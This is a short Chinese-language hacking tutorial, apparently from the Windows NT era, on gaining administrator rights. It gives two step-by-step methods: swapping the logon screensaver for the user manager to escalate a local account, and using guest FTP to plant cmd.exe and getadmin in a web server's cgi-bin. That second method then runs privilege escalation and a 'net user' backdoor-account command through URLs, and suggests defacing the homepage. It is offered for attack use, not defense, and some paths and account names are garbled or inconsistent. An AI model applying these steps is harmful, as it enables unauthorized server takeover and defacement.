nt下使用匿名获得admin权限

nt下使用匿名获得admin权限的几个办法：

 
一


如果你有普通用户帐号,有个一个很简单的方法获取NTAdministrator帐号:先把c:winntsystem32下的logon.scr改名为logon.old备份

然后把usrmgr.exe改名为logon.scr然后重新启动
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器这时他就有权限把自己加到Administrator组不要忘记把文件名改回来啊!


二:


下面的技术适用于不重视NT网络攻击这类站点。因为如果不允许匿名帐号,就可能 

造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NTserver的机会。我们用ftp登陆一个NTserver,比如:www.xxx.com(示例名):

ftpccessallowed,sendidentity(e-mailname)aspassword. 

Password:输入guest@或者guest 

 
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。 

那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domainguest组

在这种情况下我们就可以进NTserver的ftp了。

 
进去以后,试试cd/c,如果运气好,改变目录成功，这时你就有了80%的把握。

现在,开始查找cgi-bin目录(或者scripts目录),进去以后,

把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin

然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

 
大约十多秒后屏幕显示:

CGIError

这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员

下面可以adduser:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20 

china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?cnn 

你再用cnn的帐号登陆,就可以改web根目录的主页了,也可以用上面的cmd.exe的方法直接修改 

 

*